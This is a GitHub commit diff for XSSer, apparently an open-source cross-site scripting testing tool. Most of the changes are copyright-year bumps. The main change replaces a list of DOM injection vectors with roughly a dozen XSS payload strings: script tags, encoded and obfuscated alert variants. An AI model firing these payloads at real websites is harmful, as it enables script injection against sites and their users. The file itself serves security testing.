-
Notifications
You must be signed in to change notification settings - Fork 242
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
28 changed files
with
584 additions
and
272 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,7 +1,7 @@ | ||
""" | ||
This file is part of the XSSer project, https://xsser.03c8.net | ||
Copyright (c) 2010/2019 | psy <[email protected]> | ||
Copyright (c) 2010/2020 | psy <[email protected]> | ||
xsser is free software; you can redistribute it and/or modify it under | ||
the terms of the GNU General Public License as published by the Free | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -4,7 +4,7 @@ | |
""" | ||
This file is part of the XSSer project, https://xsser.03c8.net | ||
Copyright (c) 2010/2019 | psy <[email protected]> | ||
Copyright (c) 2010/2020 | psy <[email protected]> | ||
xsser is free software; you can redistribute it and/or modify it under | ||
the terms of the GNU General Public License as published by the Free | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -4,7 +4,7 @@ | |
""" | ||
This file is part of the XSSer project, https://xsser.03c8.net | ||
Copyright (c) 2010/2019 | psy <[email protected]> | ||
Copyright (c) 2010/2020 | psy <[email protected]> | ||
xsser is free software; you can redistribute it and/or modify it under | ||
the terms of the GNU General Public License as published by the Free | ||
|
@@ -495,7 +495,6 @@ def print_options(cls): | |
print("Limit to follow:", cls.fli) | ||
else: | ||
print("Delaying:", cls.delay, "seconds") | ||
|
||
print("Retries:", cls.retries, "\n") | ||
|
||
def answered(self, check): | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -4,7 +4,7 @@ | |
""" | ||
This file is part of the XSSer project, https://xsser.03c8.net | ||
Copyright (c) 2010/2019 | psy <[email protected]> | ||
Copyright (c) 2010/2020 | psy <[email protected]> | ||
xsser is free software; you can redistribute it and/or modify it under | ||
the terms of the GNU General Public License as published by the Free | ||
|
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -4,7 +4,7 @@ | |
""" | ||
This file is part of the XSSer project, https://xsser.03c8.net | ||
Copyright (c) 2010/2019 | psy <[email protected]> | ||
Copyright (c) 2010/2020 | psy <[email protected]> | ||
xsser is free software; you can redistribute it and/or modify it under | ||
the terms of the GNU General Public License as published by the Free | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -4,7 +4,7 @@ | |
""" | ||
This file is part of the XSSer project, https://xsser.03c8.net | ||
Copyright (c) 2010/2019 | psy <[email protected]> | ||
Copyright (c) 2010/2020 | psy <[email protected]> | ||
xsser is free software; you can redistribute it and/or modify it under | ||
the terms of the GNU General Public License as published by the Free | ||
|
@@ -24,14 +24,42 @@ | |
## Happy Cross Hacking! ;) | ||
|
||
DOMvectors = [ | ||
{ 'payload' : """?notname=PAYLOAD&""", | ||
'browser' : """[Document Object Model Injection]"""}, | ||
{ 'payload':'''<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="PAYLOAD" style="behavior:url(#x);"><param name=postdomevents /></object>''', | ||
'browser' : """[Document Object Model Injection]"""}, | ||
{ 'payload' : """?<script>history.pushState(0,0,'PAYLOAD');</script>""", | ||
'browser' : """[Document Object Model Injection]"""}, | ||
{ 'payload' : """?name=Y%0d%0a%0d%0aPAYLOAD""", | ||
'browser' : """[Document Object Model Injection]"""}, | ||
{ 'payload' : """?foobar=name=PAYLOAD&""", | ||
'browser' : """[Document Object Model Injection]"""} | ||
# { 'payload' : """?notname=PAYLOAD&""", | ||
# 'browser' : """[Document Object Model Injection]"""}, | ||
# { 'payload':'''<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="PAYLOAD" style="behavior:url(#x);"><param name=postdomevents /></object>''', | ||
# 'browser' : """[Document Object Model Injection]"""}, | ||
# { 'payload' : """?<script>history.pushState(0,0,'PAYLOAD');</script>""", | ||
# 'browser' : """[Document Object Model Injection]"""}, | ||
# { 'payload' : """?name=Y%0d%0a%0d%0aPAYLOAD""", | ||
# 'browser' : """[Document Object Model Injection]"""}, | ||
# { 'payload' : """?foobar=name=PAYLOAD&""", | ||
# 'browser' : """[Document Object Model Injection]"""}, | ||
{ 'payload':"""Y#<script>alert('PAYLOAD')</script>""", | ||
'browser':"""[Document Object Model Injection]"""}, | ||
{ 'payload':"""Y#<%<!--'%><script>alert(PAYLOAD);</script -->""", | ||
'browser':"""[Document Object Model Injection]"""}, | ||
{ 'payload':"""Y#<script ^__^>alert(PAYLOAD)</script ^__^""", | ||
'browser':"""[Document Object Model Injection]"""}, | ||
{ 'payload':'''Y#<script src="data:text/javascript,alert(PAYLOAD)"></script>''', | ||
'browser':"""[Document Object Model Injection]"""}, | ||
{ 'payload':"""Y#<script>+-+-1-+-+alert(PAYLOAD)</script>""", | ||
'browser':"""[Document Object Model Injection]"""}, | ||
{ 'payload':"""Y#<script x> alert(PAYLOAD) </script 1=2""", | ||
'browser':"""[Document Object Model Injection]"""}, | ||
{ 'payload':'''Y#<script>a=eval;b=alert;a(b(/ PAYLOAD/.source));</script>'">''', | ||
'browser':"""[Document Object Model Injection]"""}, | ||
{ 'payload':'''Y#<script/y~~~>;alert(PAYLOAD);</script/Y~~~>''', | ||
'browser':"""[Document Object Model Injection]"""}, | ||
{ 'payload':'''Y#%00“><script>alert(PAYLOAD)</script>''', | ||
'browser':"""[Document Object Model Injection]"""}, | ||
{ 'payload':'''Y#%22%3E%3Cscript%3Ealert(PAYLOAD)%3B%3C%2Fscript%3E''', | ||
'browser':"""[Document Object Model Injection]"""}, | ||
{ 'payload':'''Y#%3Cscript%3Ealert(PAYLOAD)%3B%3C%2Fscript%3E''', | ||
'browser':"""[Document Object Model Injection]"""}, | ||
{ 'payload':'''Y#`"><%3Cscript>javascript:alert(PAYLOAD)</script>''', | ||
'browser':"""[Document Object Model Injection]"""}, | ||
{ 'payload':'''Y#%3Cscript>javascript:alert(PAYLOAD)</script>''', | ||
'browser':"""[Document Object Model Injection]"""}, | ||
{ 'payload':"""Y#<SCRIPT>a=/PAYLOAD/alert(a.source)</SCRIPT>""", | ||
'browser':"""[Document Object Model Injection]"""} | ||
] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -4,7 +4,7 @@ | |
""" | ||
This file is part of the XSSer project, https://xsser.03c8.net | ||
Copyright (c) 2010/2019 | psy <[email protected]> | ||
Copyright (c) 2010/2020 | psy <[email protected]> | ||
xsser is free software; you can redistribute it and/or modify it under | ||
the terms of the GNU General Public License as published by the Free | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -4,7 +4,7 @@ | |
""" | ||
This file is part of the XSSer project, https://xsser.03c8.net | ||
Copyright (c) 2010/2019 | psy <[email protected]> | ||
Copyright (c) 2010/2020 | psy <[email protected]> | ||
xsser is free software; you can redistribute it and/or modify it under | ||
the terms of the GNU General Public License as published by the Free | ||
|
@@ -352,7 +352,7 @@ def on_quit(self, widget, data=None): | |
Callback called when the window is destroyed (close button clicked) | ||
""" | ||
if self._flying: | ||
print("[Info] Exiting... please wait until all mosquitoes return to mothership!\n") | ||
print("[Info] Please wait... until all the mosquitoes have returned to the hieve... -> [Exiting!]\n") | ||
self._quitting = True | ||
self.on_stop_attack() | ||
self.do_quit() | ||
|
@@ -387,7 +387,6 @@ def update_counters_label(self): | |
work_count = "" | ||
crawled = "X" | ||
pars = [crawled, rem, th_count, work_count] | ||
|
||
gdk.threads_enter() | ||
self.counters_label.set_text(" ".join(pars)) | ||
if pars[3]: | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -4,7 +4,7 @@ | |
""" | ||
This file is part of the XSSer project, https://xsser.03c8.net | ||
Copyright (c) 2010/2019 | psy <[email protected]> | ||
Copyright (c) 2010/2020 | psy <[email protected]> | ||
xsser is free software; you can redistribute it and/or modify it under | ||
the terms of the GNU General Public License as published by the Free | ||
|
Oops, something went wrong.